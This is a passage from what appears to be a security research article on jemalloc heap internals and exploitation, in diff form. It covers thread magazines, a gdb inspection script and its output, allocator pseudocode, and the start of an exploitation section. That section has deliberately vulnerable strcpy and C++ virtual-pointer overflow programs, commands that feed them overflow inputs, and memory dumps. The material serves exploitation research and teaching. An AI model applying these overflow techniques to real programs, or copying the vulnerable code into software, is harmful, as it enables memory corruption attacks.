+itself can lead to interesting scenarios but they are out of the scope
+of this article since the chances of achieving something like this are
+quite low. Nevertheless, a quick review of the code reveals that one
+may be able to achieve this goal by forcing huge allocations once she
+controls the physically last region of an arena. The attack is possible
+if and only if the mappings that will hold the base pointers are allocated
+right after the attacker controlled region.
+
+A careful reader would have noticed that if an attacker manages to pass
+a controlled value as the first argument to 'base_node_dealloc()' she
+can get a '4bytes anywhere' result. Unfortunately, as far as the authors
+can see, this is possible only if the global red black tree holding the
+huge allocations is corrupted. This situation is far more difficult to
+achieve than the one described in the previous paragraph. Nevertheless,
+we would really like to hear from anyone that manages to do so.
+
+
+------[ 2.1.7 - Thread caches (tcache_t)
+
+In the previous paragraphs we mentioned how jemalloc allocates new arenas
+at will in order to avoid lock contention. In this section we will focus on
+the mechanisms that are activated on multicore systems and multithreaded
+programs.
+
+Let's set the following straight:
+
+1) A multicore system is the reason jemalloc allocates more than one arena.
+On a unicore system there's only one available arena, even on multithreaded
+applications. However, the Firefox jemalloc variant has just one arena
+hardcoded, therefore it has no thread caches.
+
+2) On a multicore system, even if the target application runs on a single
+thread, more than one arenas are used.
+
+No matter what the number of cores on the system is, a multithreaded
+application utilizing jemalloc will make use of the so called 'magazines'
+(also called 'tcaches' on newer versions of jemalloc). Magazines (tcaches)
+are thread local structures used to avoid thread blocking problems.
+Whenever a thread wishes to allocate a memory region, jemalloc will use
+those thread specific data structures instead of following the normal code
+path.
+
+
+void *
+arena_malloc(arena_t *arena, size_t size, bool zero)
+{
+    ...
+
+    if (size <= bin_maxclass) {
+#ifdef MALLOC_MAG
+        if (__isthreaded && opt_mag) {
+            mag_rack_t *rack = mag_rack;
+            if (rack == NULL) {
+                rack = mag_rack_create(arena);
+                ...
+
+                return (mag_rack_alloc(rack, size, zero));
+            }
+            else
+#endif
+                return (arena_malloc_small(arena, size, zero));
+        }
+        ...
+}
+
+
+The 'opt_mag' variable is true by default. The variable '__isthreaded' is
+exported by 'libthr', the pthread implementation for FreeBSD and is set to
+1 on a call to 'pthread_create()'. Obviously, the rest of the details are
+out of the scope of this article.
+
+In this section we will analyze thread magazines, but the exact same
+principles apply on the tcaches (the change in the nomenclature is probably
+the most notable difference between them).
+
+The behavior of thread magazines is affected by the following macros that
+are _defined_:
+
+  MALLOC_MAG - Make use of thread magazines.
+
+  MALLOC_BALANCE - Balance arena usage using a simple linear random number
+  generator (have a look at 'choose_arena()').
+
+The following constants are _undefined_:
+
+  NO_TLS - TLS _is_ available on __i386__
+
+Furthermore, 'opt_mag', the jemalloc runtime option controlling thread
+magazine usage, is, as we mentioned earlier, enabled by default.
+
+The following figure depicts the relationship between the various thread
+magazines' structures.
+
+
+.-------------------------------------------.
+|                mag_rack_t                 |
+|                                           |
+|           bin_mags_t bin_mags[];          |
+|                                           |
+|  .-------------------------------------.  |
+|  | bin_mags[0] ... bin_mags[nbins - 1] |  |
+|  `-------------------------------------'  |
+`--------|----------------------------------'
+         |
+         |                                   .------------------.
+         |                      +----------->|      mag_t       |
+         v                      |            |                  |
+.----------------------.        |            |  void *rounds[]  |
+|      bin_mags_t      |        |            |       ...        |
+|                      |        |            `------------------'
+|  .----------------.  |        |
+|  | mag_t *curmag; |-----------+
+|  `----------------'  |
+|         ...          |
+`----------------------'
+
+
+The core of the aforementioned thread local metadata is the 'mag_rack_t'. A
+'mag_rack_t' is a simplified equivalent of an arena. It is composed of a
+single array of 'bin_mags_t' structures. Each thread in a program is
+associated with a private 'mag_rack_t' which has a lifetime equal to the
+application's.
+
+
+typedef struct mag_rack_s mag_rack_t;
+struct mag_rack_s {
+    bin_mags_t bin_mags[1]; /* Dynamically sized. */
+};
+
+
+Bins belonging to magazine racks are represented by 'bin_mags_t' structures
+(notice the plural form).
+
+
+/*
+ * Magazines are lazily allocated, but once created, they remain until the
+ * associated mag_rack is destroyed.
+ */
+typedef struct bin_mags_s bin_mags_t;
+struct bin_mags_s {
+    mag_t *curmag;
+    mag_t *sparemag;
+};
+
+typedef struct mag_s mag_t;
+struct mag_s {
+    size_t binind; /* Index of associated bin. */
+    size_t nrounds;
+    void *rounds[1]; /* Dynamically sized. */
+};
+
+
+Just like a normal bin is associated with a run, a 'bin_mags_t' structure
+is associated with a magazine pointed by 'curmag' (recall 'runcur'). A
+magazine is nothing special but a simple array of void pointers which hold
+memory addresses of preallocated memory regions which are exclusively used
+by a single thread. Magazines are populated in function 'mag_load()' as
+seen below.
+
+
+void
+mag_load(mag_t *mag)
+{
+    arena_t *arena;
+    arena_bin_t *bin;
+    arena_run_t *run;
+    void *round;
+    size_t i;
+
+    /* Pick a random arena and the bin responsible for servicing
+     * the required size class.
+     */
+    arena = choose_arena();
+    bin = &arena->bins[mag->binind];
+    ...
+
+    for (i = mag->nrounds; i < max_rounds; i++) {
+        ...
+
+        if ((run = bin->runcur) != NULL && run->nfree > 0)
+            round = arena_bin_malloc_easy(arena, bin, run); /* [3-23] */
+        else
+            round = arena_bin_malloc_hard(arena, bin); /* [3-24] */
+
+        if (round == NULL)
+            break;
+
+        /* Each 'rounds' holds a preallocated memory region. */
+        mag->rounds[i] = round;
+    }
+
+    ...
+    mag->nrounds = i;
+}
+
+
+When a thread calls 'malloc()', the call chain eventually reaches
+'mag_rack_alloc()' and then 'mag_alloc()'.
+
+
+/* Just return the next available void pointer. It points to one of the
+ * preallocated memory regions.
+ */
+void *
+mag_alloc(mag_t *mag)
+{
+    if (mag->nrounds == 0)
+        return (NULL);
+    mag->nrounds--;
+
+    return (mag->rounds[mag->nrounds]);
+}
+
+
+The most notable thing about magazines is the fact that 'rounds', the array
+of void pointers, as well as all the related thread metadata (magazine
+racks, magazine bins and so on) are allocated by normal calls to functions
+'arena_bin_malloc_xxx()' ([3-23], [3-24]). This results in the thread
+metadata lying around normal memory regions.
+
+
+------[ 2.1.8 - Unmask jemalloc
+
+As we are sure you are all aware, since version 7.0, gdb can be scripted
+with Python. In order to unmask and bring to light the internals of the
+various jemalloc flavors, we have developed a Python script for gdb
+appropriately named unmask_jemalloc.py.  The following is a sample run of
+the script on Firefox 11.0 on Linux x86 (edited for readability):
+
+
+$ ./firefox-bin &
+
+$ gdb -x ./gdbinit -p `ps x | grep firefox | grep -v grep \
+| grep -v debug | awk '{print $1}'`
+
+GNU gdb (GDB) 7.4-debian
+...
+Attaching to process 3493
+add symbol table from file "/dbg/firefox-latest-symbols/firefox-bin.dbg" at
+    .text_addr = 0x80494b0
+add symbol table from file "/dbg/firefox-latest-symbols/libxul.so.dbg" at
+    .text_addr = 0xb5b9a9d0
+...
+[Thread 0xa4ffdb70 (LWP 3533) exited]
+[Thread 0xa57feb70 (LWP 3537) exited]
+[New Thread 0xa57feb70 (LWP 3556)]
+[Thread 0xa57feb70 (LWP 3556) exited]
+
+gdb $ source unmask_jemalloc.py
+gdb $ unmask_jemalloc runs
+
+[jemalloc] [number of arenas:       1]
+[jemalloc] [number of bins:         24]
+[jemalloc] [no magazines/thread caches detected]
+
+[jemalloc] [arena #00] [bin #00] [region size: 0x0004]
+                                            [current run at: 0xa52d9000]
+[jemalloc] [arena #00] [bin #01] [region size: 0x0008]
+                                            [current run at: 0xa37c8000]
+[jemalloc] [arena #00] [bin #02] [region size: 0x0010]
+                                            [current run at: 0xa372c000]
+[jemalloc] [arena #00] [bin #03] [region size: 0x0020]
+                                            [current run at: 0xa334d000]
+[jemalloc] [arena #00] [bin #04] [region size: 0x0030]
+                                            [current run at: 0xa3347000]
+[jemalloc] [arena #00] [bin #05] [region size: 0x0040]
+                                            [current run at: 0xa334a000]
+[jemalloc] [arena #00] [bin #06] [region size: 0x0050]
+                                            [current run at: 0xa3732000]
+[jemalloc] [arena #00] [bin #07] [region size: 0x0060]
+                                            [current run at: 0xa3701000]
+[jemalloc] [arena #00] [bin #08] [region size: 0x0070]
+                                            [current run at: 0xa3810000]
+[jemalloc] [arena #00] [bin #09] [region size: 0x0080]
+                                            [current run at: 0xa3321000]
+[jemalloc] [arena #00] [bin #10] [region size: 0x00f0]
+                                            [current run at: 0xa57c7000]
+[jemalloc] [arena #00] [bin #11] [region size: 0x0100]
+                                            [current run at: 0xa37e9000]
+[jemalloc] [arena #00] [bin #12] [region size: 0x0110]
+                                            [current run at: 0xa5a9b000]
+[jemalloc] [arena #00] [bin #13] [region size: 0x0120]
+                                            [current run at: 0xa56ea000]
+[jemalloc] [arena #00] [bin #14] [region size: 0x0130]
+                                            [current run at: 0xa3709000]
+[jemalloc] [arena #00] [bin #15] [region size: 0x0140]
+                                            [current run at: 0xa382c000]
+[jemalloc] [arena #00] [bin #16] [region size: 0x0150]
+                                            [current run at: 0xa39da000]
+[jemalloc] [arena #00] [bin #17] [region size: 0x0160]
+                                            [current run at: 0xa56ee000]
+[jemalloc] [arena #00] [bin #18] [region size: 0x0170]
+                                            [current run at: 0xa3849000]
+[jemalloc] [arena #00] [bin #19] [region size: 0x0180]
+                                            [current run at: 0xa3a21000]
+[jemalloc] [arena #00] [bin #20] [region size: 0x01f0]
+                                            [current run at: 0xafc51000]
+[jemalloc] [arena #00] [bin #21] [region size: 0x0200]
+                                            [current run at: 0xa3751000]
+[jemalloc] [arena #00] [bin #22] [region size: 0x0400]
+                                            [current run at: 0xa371d000]
+[jemalloc] [arena #00] [bin #23] [region size: 0x0800]
+                                            [current run at: 0xa370d000]
+
+[jemalloc] [run 0xa3347000] [from 0xa3347000 to 0xa3348000L] 
+[jemalloc] [run 0xa371d000] [from 0xa371d000 to 0xa3725000L] 
+[jemalloc] [run 0xa3321000] [from 0xa3321000 to 0xa3323000L] 
+[jemalloc] [run 0xa334a000] [from 0xa334a000 to 0xa334b000L] 
+[jemalloc] [run 0xa370d000] [from 0xa370d000 to 0xa3715000L] 
+[jemalloc] [run 0xa3709000] [from 0xa3709000 to 0xa370d000L] 
+[jemalloc] [run 0xa37c8000] [from 0xa37c8000 to 0xa37c9000L] 
+[jemalloc] [run 0xa5a9b000] [from 0xa5a9b000 to 0xa5a9f000L] 
+[jemalloc] [run 0xa3a21000] [from 0xa3a21000 to 0xa3a27000L] 
+[jemalloc] [run 0xa382c000] [from 0xa382c000 to 0xa3831000L] 
+[jemalloc] [run 0xa3701000] [from 0xa3701000 to 0xa3702000L] 
+[jemalloc] [run 0xa57c7000] [from 0xa57c7000 to 0xa57ca000L] 
+[jemalloc] [run 0xa56ee000] [from 0xa56ee000 to 0xa56f3000L] 
+[jemalloc] [run 0xa39da000] [from 0xa39da000 to 0xa39df000L] 
+[jemalloc] [run 0xa37e9000] [from 0xa37e9000 to 0xa37ed000L] 
+[jemalloc] [run 0xa3810000] [from 0xa3810000 to 0xa3812000L] 
+[jemalloc] [run 0xa3751000] [from 0xa3751000 to 0xa3759000L] 
+[jemalloc] [run 0xafc51000] [from 0xafc51000 to 0xafc58000L] 
+[jemalloc] [run 0xa334d000] [from 0xa334d000 to 0xa334e000L] 
+[jemalloc] [run 0xa372c000] [from 0xa372c000 to 0xa372d000L] 
+[jemalloc] [run 0xa52d9000] [from 0xa52d9000 to 0xa52da000L] 
+[jemalloc] [run 0xa56ea000] [from 0xa56ea000 to 0xa56ee000L] 
+[jemalloc] [run 0xa3732000] [from 0xa3732000 to 0xa3733000L] 
+[jemalloc] [run 0xa3849000] [from 0xa3849000 to 0xa384e000L] 
+
+
+There is also preliminary support for Mac OS X (x86_64), tested on Lion
+10.7.3 with Firefox 11.0. Also, note that Apple's gdb does not have Python
+scripting support, so the following was obtained with a custom-compiled
+gdb:
+
+
+$ open firefox-11.0.app
+
+$ gdb -nx -x ./gdbinit -p 837
+
+...
+Attaching to process 837
+[New Thread 0x2003 of process 837]
+[New Thread 0x2103 of process 837]
+[New Thread 0x2203 of process 837]
+[New Thread 0x2303 of process 837]
+[New Thread 0x2403 of process 837]
+[New Thread 0x2503 of process 837]
+[New Thread 0x2603 of process 837]
+[New Thread 0x2703 of process 837]
+[New Thread 0x2803 of process 837]
+[New Thread 0x2903 of process 837]
+[New Thread 0x2a03 of process 837]
+[New Thread 0x2b03 of process 837]
+[New Thread 0x2c03 of process 837]
+[New Thread 0x2d03 of process 837]
+[New Thread 0x2e03 of process 837]
+Reading symbols from
+/dbg/firefox-11.0.app/Contents/MacOS/firefox...done
+Reading symbols from
+/dbg/firefox-11.0.app/Contents/MacOS/firefox.dSYM/
+Contents/Resources/DWARF/firefox...done.
+0x00007fff8636b67a in ?? () from /usr/lib/system/libsystem_kernel.dylib
+(gdb) source unmask_jemalloc.py
+(gdb) unmask_jemalloc
+
+[jemalloc] [number of arenas:       1]
+[jemalloc] [number of bins:         35]
+[jemalloc] [no magazines/thread caches detected]
+
+[jemalloc] [arena #00] [bin #00] [region size: 0x0008]
+                                            [current run at: 0x108fe0000]
+[jemalloc] [arena #00] [bin #01] [region size: 0x0010]
+                                            [current run at: 0x1003f5000]
+[jemalloc] [arena #00] [bin #02] [region size: 0x0020]
+                                            [current run at: 0x1003bc000]
+[jemalloc] [arena #00] [bin #03] [region size: 0x0030]
+                                            [current run at: 0x1003d7000]
+[jemalloc] [arena #00] [bin #04] [region size: 0x0040]
+                                            [current run at: 0x1054c6000]
+[jemalloc] [arena #00] [bin #05] [region size: 0x0050]
+                                            [current run at: 0x103652000]
+[jemalloc] [arena #00] [bin #06] [region size: 0x0060]
+                                            [current run at: 0x110c9c000]
+[jemalloc] [arena #00] [bin #07] [region size: 0x0070]
+                                            [current run at: 0x106bef000]
+[jemalloc] [arena #00] [bin #08] [region size: 0x0080]
+                                            [current run at: 0x10693b000]
+[jemalloc] [arena #00] [bin #09] [region size: 0x0090]
+                                            [current run at: 0x10692e000]
+[jemalloc] [arena #00] [bin #10] [region size: 0x00a0]
+                                            [current run at: 0x106743000]
+[jemalloc] [arena #00] [bin #11] [region size: 0x00b0]
+                                            [current run at: 0x109525000]
+[jemalloc] [arena #00] [bin #12] [region size: 0x00c0]
+                                            [current run at: 0x1127c2000]
+[jemalloc] [arena #00] [bin #13] [region size: 0x00d0]
+                                            [current run at: 0x106797000]
+[jemalloc] [arena #00] [bin #14] [region size: 0x00e0]
+                                            [current run at: 0x109296000]
+[jemalloc] [arena #00] [bin #15] [region size: 0x00f0]
+                                            [current run at: 0x110aa9000]
+[jemalloc] [arena #00] [bin #16] [region size: 0x0100]
+                                            [current run at: 0x106c70000]
+[jemalloc] [arena #00] [bin #17] [region size: 0x0110]
+                                            [current run at: 0x109556000]
+[jemalloc] [arena #00] [bin #18] [region size: 0x0120]
+                                            [current run at: 0x1092bf000]
+[jemalloc] [arena #00] [bin #19] [region size: 0x0130]
+                                            [current run at: 0x1092a2000]
+[jemalloc] [arena #00] [bin #20] [region size: 0x0140]
+                                            [current run at: 0x10036a000]
+[jemalloc] [arena #00] [bin #21] [region size: 0x0150]
+                                            [current run at: 0x100353000]
+[jemalloc] [arena #00] [bin #22] [region size: 0x0160]
+                                            [current run at: 0x1093d3000]
+[jemalloc] [arena #00] [bin #23] [region size: 0x0170]
+                                            [current run at: 0x10f024000]
+[jemalloc] [arena #00] [bin #24] [region size: 0x0180]
+                                            [current run at: 0x106b58000]
+[jemalloc] [arena #00] [bin #25] [region size: 0x0190]
+                                            [current run at: 0x10f002000]
+[jemalloc] [arena #00] [bin #26] [region size: 0x01a0]
+                                            [current run at: 0x10f071000]
+[jemalloc] [arena #00] [bin #27] [region size: 0x01b0]
+                                            [current run at: 0x109139000]
+[jemalloc] [arena #00] [bin #28] [region size: 0x01c0]
+                                            [current run at: 0x1091c6000]
+[jemalloc] [arena #00] [bin #29] [region size: 0x01d0]
+                                            [current run at: 0x10032a000]
+[jemalloc] [arena #00] [bin #30] [region size: 0x01e0]
+                                            [current run at: 0x1054f9000]
+[jemalloc] [arena #00] [bin #31] [region size: 0x01f0]
+                                            [current run at: 0x10034c000]
+[jemalloc] [arena #00] [bin #32] [region size: 0x0200]
+                                            [current run at: 0x106739000]
+[jemalloc] [arena #00] [bin #33] [region size: 0x0400]
+                                            [current run at: 0x106c68000]
+[jemalloc] [arena #00] [bin #34] [region size: 0x0800]
+                                            [current run at: 0x10367e000]
+
+
+We did our best to test unmask_jemalloc.py on all jemalloc variants,
+however there are probably some bugs left. Feel free to test it and send us
+patches. The development of unmask_jemalloc.py will continue at [UJEM].
+
+
+----[ 2.2 - Algorithms
+
+In this section we present pseudocode the describes the allocation and
+deallocation algorithms implemented by jemalloc. We start with malloc():
+
+
+MALLOC(size):
+    IF size CAN BE SERVICED BY AN ARENA:
+        IF size IS SMALL OR MEDIUM:
+            bin = get_bin_for_size(size)
+
+            IF bin->runcur EXISTS AND NOT FULL:
+                run = bin->runcur
+            ELSE:
+                run = lookup_or_allocate_nonfull_run()
+                bin->runcur = run
+
+            bit = get_first_set_bit(run->regs_mask)
+            region = get_region(run, bit)
+
+        ELIF size IS LARGE:
+            region = allocate_new_run()
+    ELSE:
+        region = allocate_new_chunk()
+    RETURN region
+
+
+calloc() is as you would expect:
+
+
+CALLOC(n, size):
+    RETURN MALLOC(n * size)
+
+
+Finally, the pseudocode for free():
+
+
+FREE(addr):
+    IF addr IS NOT EQUAL TO THE CHUNK IT BELONGS:
+        IF addr IS A SMALL ALLOCATION:
+            run = get_run_addr_belongs_to(addr);
+            bin = run->bin;
+            size = bin->reg_size;
+            element = get_element_index(addr, run, bin)
+            unset_bit(run->regs_mask[element])
+
+        ELSE: /* addr is a large allocation */
+            run = get_run_addr_belongs_to(addr)
+            chunk = get_chunk_run_belongs_to(run)
+            run_index = get_run_index(run, chunk)
+            mark_pages_of_run_as_free(run_index)
+
+            IF ALL THE PAGES OF chunk ARE MARKED AS FREE:
+                unmap_the_chunk_s_pages(chunk)
+
+    ELSE: /* this is a huge allocation */
+        unmap_the_huge_allocation_s_pages(addr)
+
+
+--[ 3 - Exploitation tactics
+
+In this section we analyze the exploitation tactics we have investigated
+against jemalloc. Our goal is to provide to the interested hackers the
+necessary knowledge and tools to develop exploits for jemalloc heap
+corruption bugs.
+
+We also try to approach jemalloc heap exploitation in an abstract way
+initially, identifying 'exploitation primitives' and then continuing into
+the specific required technical details. Chris Valasek and Ryan Smith have
+explored the value of abstracting heap exploitation through primitives
+[CVRS]. The main idea is that specific exploitation techniques eventually
+become obsolete. Therefore it is important to approach exploitation
+abstractly and identify primitives that can applied to new targets. We have
+used this approach before, comparing FreeBSD and Linux kernel heap
+exploitation [HAPF, APHN]. Regarding jemalloc, we analyze adjacent data
+corruption, heap manipulation and metadata corruption exploitation
+primitives.
+
+
+----[ 3.1 - Adjacent region corruption
+
+The main idea behind adjacent heap item corruptions is that you exploit the
+fact that the heap manager places user allocations next to each other
+contiguously without other data in between. In jemalloc regions of the same
+size class are placed on the same bin. In the case that they are also
+placed on the same run of the bin then there are no inline metadata between
+them. In 3.2 we will see how we can force this, but for now let's assume
+that new allocations of the same size class are placed in the same run.
+
+Therefore, we can place a victim object/structure of our choosing in the
+same run and next to the vulnerable object/structure we plan to overflow.
+The only requirement is that the victim and vulnerable objects need to be
+of a size that puts them in the same size class and therefore possibly in
+the same run (again, see the next subsection on how to control this). Since
+there are no metadata between the two regions, we can overflow from the
+vulnerable region to the victim region we have chosen. Usually the victim
+region is something that can help us achieve arbitrary code execution, for
+example function pointers.
+
+In the following contrived example consider that 'three' is your chosen
+victim object and that the vulnerable object is 'two' (full code in file
+test-adjacent.c):
+
+
+char *one, *two, *three;
+
+printf("[*] before overflowing\n");
+
+one = malloc(0x10);
+memset(one, 0x41, 0x10);
+printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
+
+two = malloc(0x10);
+memset(two, 0x42, 0x10);
+printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
+
+three = malloc(0x10);
+memset(three, 0x43, 0x10);
+printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
+
+[3-1]
+
+printf("[+] copying argv[1] to region two\n");
+strcpy(two, argv[1]);
+
+printf("[*] after overflowing\n");
+printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
+printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
+printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
+
+[3-2]
+
+free(one);
+free(two);
+free(three);
+
+printf("[*] after freeing all regions\n");
+printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
+printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
+printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
+
+[3-3]
+
+
+The output (edited for readability):
+
+
+$ ./test-adjacent `python -c 'print "X" * 30'`
+[*] before overflowing
+[+] region one:   0xb7003030: AAAAAAAAAAAAAAAA
+[+] region two:   0xb7003040: BBBBBBBBBBBBBBBB
+[+] region three: 0xb7003050: CCCCCCCCCCCCCCCC
+[+] copying argv[1] to region two
+[*] after overflowing
+[+] region one:   0xb7003030: 
+AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+[+] region two:   0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+[+] region three: 0xb7003050: XXXXXXXXXXXXXX
+[*] after freeing all regions
+[+] region one:   0xb7003030: 
+AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+[+] region two:   0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+[+] region three: 0xb7003050: XXXXXXXXXXXXXX
+
+
+Examining the above we can see that region 'one' is at 0xb7003030 and that
+the following two allocations (regions 'two' and 'three') are in the same
+run immediately after 'one' and all three next to each other without any
+metadata in between them. After the overflow of 'two' with 30 'X's we can
+see that region 'three' has been overwritten with 14 'X's (30 - 16 for the
+size of region 'two').
+
+In order to achieve a better understanding of the jemalloc memory layout
+let's fire up gdb with three breakpoints at [3-1], [3-2] and [3-3].
+
+At breakpoint [3-1]:
+
+
+Breakpoint 1, 0x080486a9 in main ()
+gdb $ print arenas[0].bins[2].runcur
+$1 = (arena_run_t *) 0xb7003000
+
+
+At 0xb7003000 is the current run of the bin bins[2] that manages the size
+class 16 in the standalone jemalloc flavor that we have linked against.
+Let's take a look at the run's contents:
+
+
+gdb $ x/40x 0xb7003000
+0xb7003000: 0xb78007ec  0x00000003  0x000000fa  0xfffffff8
+0xb7003010: 0xffffffff  0xffffffff  0xffffffff  0xffffffff
+0xb7003020: 0xffffffff  0xffffffff  0x1fffffff  0x000000ff
+0xb7003030: 0x41414141  0x41414141  0x41414141  0x41414141
+0xb7003040: 0x42424242  0x42424242  0x42424242  0x42424242
+0xb7003050: 0x43434343  0x43434343  0x43434343  0x43434343
+0xb7003060: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7003070: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7003080: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7003090: 0x00000000  0x00000000  0x00000000  0x00000000
+
+
+After some initial metadata (the run's header which we will see in more
+detail at 3.3.1) we have region 'one' at 0xb7003030 followed by regions
+'two' and 'three', all of size 16 bytes. Again we can see that there are no
+metadata between the regions. Continuing to breakpoint [3-2] and examining
+again the contents of the run:
+
+
+Breakpoint 2, 0x08048724 in main ()
+gdb $ x/40x 0xb7003000
+0xb7003000: 0xb78007ec  0x00000003  0x000000fa  0xfffffff8
+0xb7003010: 0xffffffff  0xffffffff  0xffffffff  0xffffffff
+0xb7003020: 0xffffffff  0xffffffff  0x1fffffff  0x000000ff
+0xb7003030: 0x41414141  0x41414141  0x41414141  0x41414141
+0xb7003040: 0x58585858  0x58585858  0x58585858  0x58585858
+0xb7003050: 0x58585858  0x58585858  0x58585858  0x43005858
+0xb7003060: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7003070: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7003080: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7003090: 0x00000000  0x00000000  0x00000000  0x00000000
+
+
+We can see that our 30 'X's (0x58) have overwritten the complete 16 bytes
+of region 'two' at 0xb7003040 and continued for 15 bytes (14 plus a NULL
+from strcpy(3)) in region 'three' at 0xb7003050. From this memory dump it
+should be clear why the printf(3) call of region 'one' after the overflow
+continues to print all 46 bytes (16 from region 'one' plus 30 from the
+overflow) up to the NULL placed by the strcpy(3) call. As it has been
+demonstrated by Peter Vreugdenhil in the context of Internet Explorer heap
+overflows [PV10], this can lead to information leaks from the region that
+is adjacent to the region with the string whose terminating NULL has been
+overwritten. You just need to read back the string and you will get all
+data up to the first encountered NULL.
+
+At breakpoint [3-3] after the deallocation of all three regions:
+
+
+Breakpoint 3, 0x080487ab in main ()
+gdb $ x/40x 0xb7003000
+0xb7003000: 0xb78007ec  0x00000003  0x000000fd  0xffffffff
+0xb7003010: 0xffffffff  0xffffffff  0xffffffff  0xffffffff
+0xb7003020: 0xffffffff  0xffffffff  0x1fffffff  0x000000ff
+0xb7003030: 0x41414141  0x41414141  0x41414141  0x41414141
+0xb7003040: 0x58585858  0x58585858  0x58585858  0x58585858
+0xb7003050: 0x58585858  0x58585858  0x58585858  0x43005858
+0xb7003060: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7003070: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7003080: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7003090: 0x00000000  0x00000000  0x00000000  0x00000000
+
+
+We can see that jemalloc does not clear the freed regions. This behavior of
+leaving stale data in regions that have been freed and can be allocated
+again can lead to easier exploitation of use-after-free bugs (see next
+section).
+
+To explore the adjacent region corruption primitive further in the context
+of jemalloc, we will now look at C++ and virtual function pointers (VPTRs).
+We will only focus on jemalloc-related details; for more general
+information the interested reader should see rix's Phrack paper (the
+principles of which are still applicable) [VPTR]. We begin with a C++
+example that is based on rix's bo2.cpp (file vuln-vptr.cpp in the code
+archive):
+
+
+class base
+{
+    private:
+
+        char buf[32];
+
+    public:
+
+        void
+        copy(const char *str)
+        {
+            strcpy(buf, str);
+        }
+        
+        virtual void
+        print(void)
+        {
+            printf("buf: 0x%08x: %s\n", buf, buf);
+        }
+};
+
+class derived_a : public base
+{
+    public:
+
+        void
+        print(void)
+        {
+            printf("[+] derived_a: ");
+            base::print();
+        }
+};
+
+class derived_b : public base
+{
+    public:
+
+        void
+        print(void)
+        {
+            printf("[+] derived_b: ");
+            base::print();
+        }
+};
+
+int
+main(int argc, char *argv[])
+{
+    base *obj_a;
+    base *obj_b;
+
+    obj_a = new derived_a;
+    obj_b = new derived_b;
+
+    printf("[+] obj_a:\t0x%x\n", (unsigned int)obj_a);
+    printf("[+] obj_b:\t0x%x\n", (unsigned int)obj_b);
+
+    if(argc == 3)
+    {
+        printf("[+] overflowing from obj_a into obj_b\n");
+        obj_a->copy(argv[1]);
+
+        obj_b->copy(argv[2]);
+
+        obj_a->print();
+        obj_b->print();
+
+        return 0;
+    }
+
+
+We have a base class with a virtual function, 'print(void)', and two
+derived classes that overload this virtual function. Then in main, we use
+'new' to create two new objects, one from each of the derived classes.
+Subsequently we overflow the 'buf' buffer of 'obj_a' with 'argv[1]'.
+
+Let's explore with gdb:
+
+
+$ gdb vuln-vptr
+...
+gdb $ r `python -c 'print "A" * 48'` `python -c 'print "B" * 10'`
+...
+0x804862f <main(int, char**)+15>:    movl   $0x24,(%esp)
+0x8048636 <main(int, char**)+22>:    call   0x80485fc <_Znwj@plt>
+0x804863b <main(int, char**)+27>:    movl   $0x80489e0,(%eax)
+gdb $ print $eax
+$13 = 0xb7c01040
+
+
+At 0x8048636 we can see the first 'new' call which takes as a parameter the
+size of the object to create, that is 0x24 or 36 bytes. C++ will of course
+use jemalloc to allocate the required amount of memory for this new object.
+After the call instruction, EAX has the address of the allocated region
+(0xb7c01040) and at 0x804863b the value 0x80489e0 is moved there. This is
+the VPTR that points to 'print(void)' of 'obj_a':
+
+
+gdb $ x/x *0x080489e0
+0x80487d0 <derived_a::print()>: 0xc71cec83
+
+
+Now it must be clear why even though the declared buffer is 32 bytes long,
+there are 36 bytes allocated for the object. Exactly the same as above
+happens with the second 'new' call, but this time the VPTR points to
+'obj_b' (which is at 0xb7c01070):
+
+
+0x8048643 <main(int, char**)+35>:    movl   $0x24,(%esp)
+0x804864a <main(int, char**)+42>:    call   0x80485fc <_Znwj@plt>
+0x804864f <main(int, char**)+47>:    movl   $0x80489f0,(%eax)
+gdb $ x/x *0x080489f0
+0x8048800 <derived_b::print()>: 0xc71cec83
+gdb $ print $eax
+$14 = 0xb7c01070
+
+
+At this point, let's explore jemalloc's internals:
+
+
+gdb $ print arenas[0].bins[5].runcur
+$8 = (arena_run_t *) 0xb7c01000
+gdb $ print arenas[0].bins[5].reg_size
+$9 = 0x30
+gdb $ print arenas[0].bins[4].reg_size
+$10 = 0x20
+gdb $ x/40x 0xb7c01000
+0xb7c01000: 0xb7fd315c  0x00000000  0x00000052  0xfffffffc
+0xb7c01010: 0xffffffff  0x000fffff  0x00000000  0x00000000
+0xb7c01020: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7c01030: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7c01040: 0x080489e0  0x00000000  0x00000000  0x00000000
+0xb7c01050: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7c01060: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7c01070: 0x080489f0  0x00000000  0x00000000  0x00000000
+0xb7c01080: 0x00000000  0x00000000  0x00000000  0x00000000
+0xb7c01090: 0x00000000  0x00000000  0x00000000  0x00000000
+
+
+Our run is at 0xb7c01000 and the bin is bin[5] which handles regions of
+size 0x30 (48 in decimal). Since our objects are of size 36 bytes they
+don't fit in the previous bin, i.e. bin[4], of size 0x20 (32). We can see
+'obj_a' at 0xb7c01040 with its VPTR (0x080489e0) and 'obj_b' at 0xb7c01070
+with its own VPTR (0x080489f0).
+
